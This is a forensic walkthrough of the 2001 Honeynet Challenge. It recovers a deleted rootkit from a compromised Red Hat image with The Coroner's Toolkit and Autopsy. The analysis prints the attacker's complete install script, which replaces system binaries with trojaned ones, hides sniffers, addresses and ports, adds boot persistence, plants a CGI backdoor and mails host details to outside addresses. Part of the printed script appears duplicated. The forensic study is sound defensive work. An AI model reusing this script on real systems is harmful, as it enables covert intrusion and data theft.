Step by Step:
1. Acquire compressed image from:
http://project.honeynet.org/scans/scan15/honeynet.tar.gz.
2. Mount image read only on a Linux-system.
# mkdir
/honeynet
# mount
-o ro,loop,nodev,noexec honeypot.hda8.dd /honeynet
3. Download and install The Coroners Toolkit, TCTUTILS, autopsy. Since the README's
for all the packages are self explanatory, I am only including links to these files.
The Coroners Toolkit http://www.porcupine.org/forensics/tct.html
TCT Utils http://www.cerias.purdue.edu/homes/carrier/forensiscs
Autopsy http://www.cerias.purdue.edu/homes/carrier/forensiscs
4. After the above products are installed launch autopsy to begin the analysis:
# autopsy
8888 localhost
Autopsy
Forensic Browser ver 1.0
Investigator:
Quincy
Paste
this as your browser URL on localhost:
localhost:8888/3004636400/autopsy
5. Pasting the URL in your browser will bring you to the Autopsy main menu:
Select both boxes under the image and click on "Enter the Lab":
You are now presented with a "File" listing of all deleted files in the "/" partition. Scrolling down to the bottom you will be presented with the most recently deleted files and directories. Referencing the MAC time stamps we see a single file, lk.tgz, that was modified, accessed and created in "/" on March 15th, 2001. This file looks intriguing, so we will restore it for further investigation.
6. We only need the inode number from the deleted file in question to recover this file using icat from The Coroners Toolkit:
# icat /honeynet/honeypot.hda8.dd 23 > /honeynet/lk.tgz
7. Uncompressing this file creates a directory /last, with the following contents:
# ls -ltr /honeynet/last
total 1472
-rwxr-xr-x 1 1031 users 1345
Sep 9 1999 cleaner*
-rw------- 1 1031 users
512 Oct 22 2000 ssh_random_seed
-rw-r--r-- 1 1031 users
344 Oct 22 2000 ssh_host_key.pub
-rw------- 1 1031 users
540 Oct 22 2000 ssh_host_key
-rw-r--r-- 1 1031 users
880 Oct 22 2000 ssh_config
-rw-r--r-- 1 1031 users
3278 Jan 27 10:11 inetd.conf
-rw-r--r-- 1 1031 users
11407 Jan 27 10:11 services
-rwxr-xr-x 1 1031 users
632066 Feb 26 09:46 mkxfs*
-rwx------ 1 1031 users
7165 Feb 26 10:22 linsniffer*
-rwxr-xr-x 1 1031 users
4060 Feb 26 10:22 sense*
-rwx------ 1 1031 users
8268 Feb 26 10:22 sl2*
-rwxr-xr-x 1 1031 users
4620 Feb 26 10:23 last.cgi*
-rwxr-xr-x 1 1031 users
33280 Feb 26 10:23 ps*
-rwxr-xr-x 1 1031 users
35300 Feb 26 10:23 netstat*
-rwxr-xr-x 1 1031 users
19840 Feb 26 10:23 ifconfig*
-rwxr-xr-x 1 1031 users
53588 Feb 26 10:23 top*
-rwx------ 1 1031 users
75 Feb 26 10:24 logclear*
-rwxr-xr-x 1 1031 users
79 Feb 26 10:28 lsattr*
-rw-r--r-- 1 1031 users
688 Feb 26 10:29 sshd_config
-rw-r--r-- 1 1031 users
1 Feb 26 10:29 pidfile
-rw-r--r-- 1 root root 708
Mar 2 22:05 s
-rwx------ 1 1031 users
3713 Mar 2 22:08 install*
-rwxr-xr-x 1 1031 users
611931 Feb 8 2002 ssh*
We have found the contents of our Root Kit!
A quick cat of /last/install and we can follow the installation of this Root Kit on our compromised system.
# cat /last/install
#!/bin/sh
clear
unset HISTFILE
echo "********* Instalarea
Rootkitului A Pornit La Drum *********"
echo "********* Mircea SUGI
PULA ********************************"
echo "********* Multumiri
La Toti Care M-Au Ajutat **************"
echo "********* Lemme Give
You A Tip : **************************"
echo "********* Ignore everything,
call your freedom ************"
echo "********* Scream &
swear as much as you can ***************"
echo "********* Cuz anyway
nobody will hear you and no one will *"
echo "********* Care about
you **********************************"
echo
echo
chown root.root *
if [ -f /usr/bin/make ];
then
echo "Are Make !"
else
echo "Nu Are Make !"
fi
if [ -f /usr/bin/gcc ];
then
echo "Are Gcc !"
else
echo "Nu Are Gcc !"
fi
if [ -f /usr/sbin/sshd/
]; then
echo "Are Ssh !"
else
echo "Nu Are Ssh !"
fi
echo -n "* Inlocuim nestat
... alea alea "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
cp -f mkxfs /usr/sbin/
echo "* Gata..."
echo -n "* Dev... "
echo
echo
touch /dev/rpm
>/dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 sshdu" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
echo "3 smurf" >>/dev/rpm
echo "3 slice" >>/dev/rpm
echo "3 mech" >>/dev/rpm
echo "3 muh" >>/dev/rpm
echo "3 bnc" >>/dev/rpm
echo "3 psybnc" >> /dev/rpm
touch /dev/last
>/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
echo "* Gata"
echo "* Facem Director...Si
Mutam Alea.. "
mkdir -p /dev/ida/.drag-on
mkdir -p /dev/ida/".. "
echo "* Copiem ssh si alea"
cp linsniffer logclear sense
sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
cp linsniffer logclear sense
sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. "
rm -rf linsniffer logclear
sense sl2 mkxfs s ssh_host_key ssh_random_seed
touch /dev/ida/.drag-on/tcp.log
touch /dev/ida/".. "/tcp.log
cp -f inetd.conf /etc
cp -f services /etc
killall -HUP inetd
echo
echo
echo
echo "* Adaugam In Startup:)
..."
rm -rf /usr/bin/lsattr
echo "/usr/bin/lsattr -t1
-X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
chmod 500 /usr/bin/lsattr
chattr +i /usr/bin/lsattr
/usr/bin/lsattr
sleep 1
if [ -d /home/httpd/cgi-bin
]
then
mv -f last.cgi /home/httpd/cgi-bin/
fi
if [ -d /usr/local/httpd/cgi-bin
]
then
mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin
]
then
mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin
]
then
mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile
dorite ..."
echo "* Info : $(uname -a)"
>> computer
echo "* Hostname : $(hostname
-f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig
| grep inet)" >> computer
echo "* Uptime : $(uptime)"
>> computer
echo "* Cpu Vendor ID :
$(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat
/proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat
/proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat
/proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df
-h)" >> computer
fi
if [ -d /usr/local/httpd/cgi-bin
]
then
mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin
]
then
mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin
]
then
mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile
dorite ..."
echo "* Info : $(uname -a)"
>> computer
echo "* Hostname : $(hostname
-f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig
| grep inet)" >> computer
echo "* Uptime : $(uptime)"
>> computer
echo "* Cpu Vendor ID :
$(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat
/proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat
/proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat
/proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df
-h)" >> computer
echo "* Gata ! Trimitem
Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte"
last@linuxmail.org
cat computer | mail -s "roote"
bidi_damm@yahoo.com
echo "* Am trimis mailul
... stergem fisierele care nu mai trebuie ."
echo
echo
echo "* G A T A *"
echo
echo "* That Was Nice Last
"
cd /
rm -rf last lk.tgz computer
lk.tar.gz
8. Returning to our autopsy browser deleted file listing, we can see that the /last directory was also deleted from our compromised system, so we now know that based on MAC time stamps and on the recovery of the deleted Root Kit that the compressed file was uncompressed on our system. But, the question remains, was the Root Kit actually installed?
9. After following through the install
script and analyzing the deleted output from autopsy you can quickly determine
that the Root Kit was infact "installed" on this
compromised system.
The quick correlation I used was the
creation of the file "/dev/last" referenced in the install script:
<snip>
touch /dev/last
>/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
</snip>
If you traverse the autopsy file browser through the /dev directory you will locate this file, here is an example of an autopsy ascii report on /dev/last:
Further correlation can be made by comparing MD5 checksums of trojanized binaries to those checksums from original RH install disk.
This completes my step-by-step analysis
of the compromised Red Hat system for the March 15, 2001 HoneyNet Challenge.